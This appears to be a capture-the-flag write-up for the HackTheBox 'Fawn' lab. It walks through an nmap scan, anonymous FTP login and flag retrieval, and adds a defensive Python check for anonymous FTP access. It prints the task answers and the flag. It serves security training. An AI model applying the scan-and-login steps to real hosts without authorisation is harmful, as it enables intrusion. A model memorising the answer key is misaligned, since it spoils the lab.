Fawn by HackTheBox is a really nice challenge, the second one in Tier 0. In today’s writeup we are going to see how we can solve this challenge in a comprehensive way.
Now let’s continue our Writeup
Fire up your terminal and scan the IP address assigned to you:
wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 10:16 IST
Nmap scan report for {target_ip}
Host is up (0.29s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.16 seconds
As you can clearly see, ftp is open on port 21:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
As we know, File Transfer Protocol is known as FTP for short.
TASK 1
What does the 3-letter acronym FTP stand for?
File Transfer Protocol
From our initial scan using nmap, we know that ftp is running on port 21.
TASK 2
Which port does the FTP service listen on usually?
21
To secure ftp, secure file transfer protocol (sftp) has been introduced.
TASK 3
What acronym is used for the secure version of FTP?
sftp
It is well known that ping is used to send an ICMP echo request to a host to test our connection, like this:
wesecure1337@kali:~$ ping google.com
PING google.com (142.250.194.78) 56(84) bytes of data.
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=1 ttl=116 time=46.2 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=2 ttl=116 time=47.7 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=3 ttl=116 time=65.0 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=4 ttl=116 time=50.8 ms
--- google.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 46.156/52.408/64.988/7.450 ms
This brings us to the answer of TASK 4
TASK 4
What is the command we can use to send an ICMP echo request to test our connection to the target?
ping
From our initial scan we know that
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
So the scan clearly shows the version of ftp used
TASK 5
From your scans, what version is FTP running on the target?
vsftpd 3.0.3
Looking at the scan result we can see the OS type
TASK 6
From your scans, what OS type is running on the target?
Unix
In general, if you want to see the help menu of any tool, just type toolname -h or toolname --help, like this:
wesecure1337@kali:~$ ftp -h
This brings us to our answer
TASK 7
What is the command we need to run in order to display the 'ftp' client help menu?
ftp -h
Using anonymous as the username and password on the ftp server, one can log in without having an account.
TASK 8
What is username that is used over FTP when you want to log in without having an account?
anonymous
Now let’s log in to the target system using ftp:
wesecure1337@kali:~$ ftp {target_ip}
Connected to target_ip.
220 (vsFTPd 3.0.3)
Name (target_ip:wesecure1337): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
As you can see, we have successfully logged in to the server without having an account, using anonymous as both username and password.
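Seen from the defender's side, the same login makes a quick audit check for FTP servers you administer. The Python below is an added example, not part of the original writeup: check_anonymous_ftp, StubFTP and audit_stub are names made up here, and the stub server with its replies is constructed so the check can run offline on loopback.

```python
import ftplib
import socketserver
import threading

def check_anonymous_ftp(host, port=21, timeout=5.0):
    """Return (banner, anonymous_allowed) for an FTP server you administer."""
    ftp = ftplib.FTP()
    try:
        banner = ftp.connect(host, port, timeout=timeout)  # 220 greeting line
        try:
            ftp.login()  # ftplib sends USER anonymous when no user is given
            return banner, True
        except ftplib.error_perm:  # 5xx reply, e.g. "530 Login incorrect."
            return banner, False
    finally:
        ftp.close()

class StubFTP(socketserver.StreamRequestHandler):
    """Constructed stand-in server: speaks only enough FTP for the login check."""
    allow_anonymous = True

    def handle(self):
        self.wfile.write(b"220 (stub FTP, constructed)\r\n")
        for raw in self.rfile:
            cmd = raw.decode("latin-1").strip().upper()
            if cmd.startswith("USER"):
                self.wfile.write(b"331 Please specify the password.\r\n")
            elif cmd.startswith("PASS") and self.allow_anonymous:
                self.wfile.write(b"230 Login successful.\r\n")
            elif cmd.startswith("PASS"):
                self.wfile.write(b"530 Login incorrect.\r\n")
            else:
                self.wfile.write(b"221 Goodbye.\r\n")
                return

def audit_stub(allow_anonymous):
    """Run the check against the stub on a loopback port chosen by the OS."""
    handler = type("Handler", (StubFTP,), {"allow_anonymous": allow_anonymous})
    with socketserver.TCPServer(("127.0.0.1", 0), handler) as srv:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        try:
            return check_anonymous_ftp("127.0.0.1", srv.server_address[1])
        finally:
            srv.shutdown()

if __name__ == "__main__":
    print(audit_stub(True), audit_stub(False))
```

A True result means the server accepts logins without an account, which is the condition this box relies on.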
Now to get the flag, follow the shown steps
ftp> ls
229 Entering Extended Passive Mode (|||13289|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||23875|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*****************************************************************************************************************| 32 254.06 KiB/s 00:00 ETA
226 Transfer complete.
ftp> exit
wesecure1337@kali:~$ cat flag.txt
035db21c881520061c53e0536e44f815
Here, get is the command used to download files from the ftp server to our machine.
This brings us to
SUBMIT FLAG
Submit root flag
035db21c881520061c53e0536e44f815
Finally, we have solved this challenge.
If you really enjoyed reading this writeup and are feeling excited, do check out our other writeups on related topics.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
Thanks for Reading!!!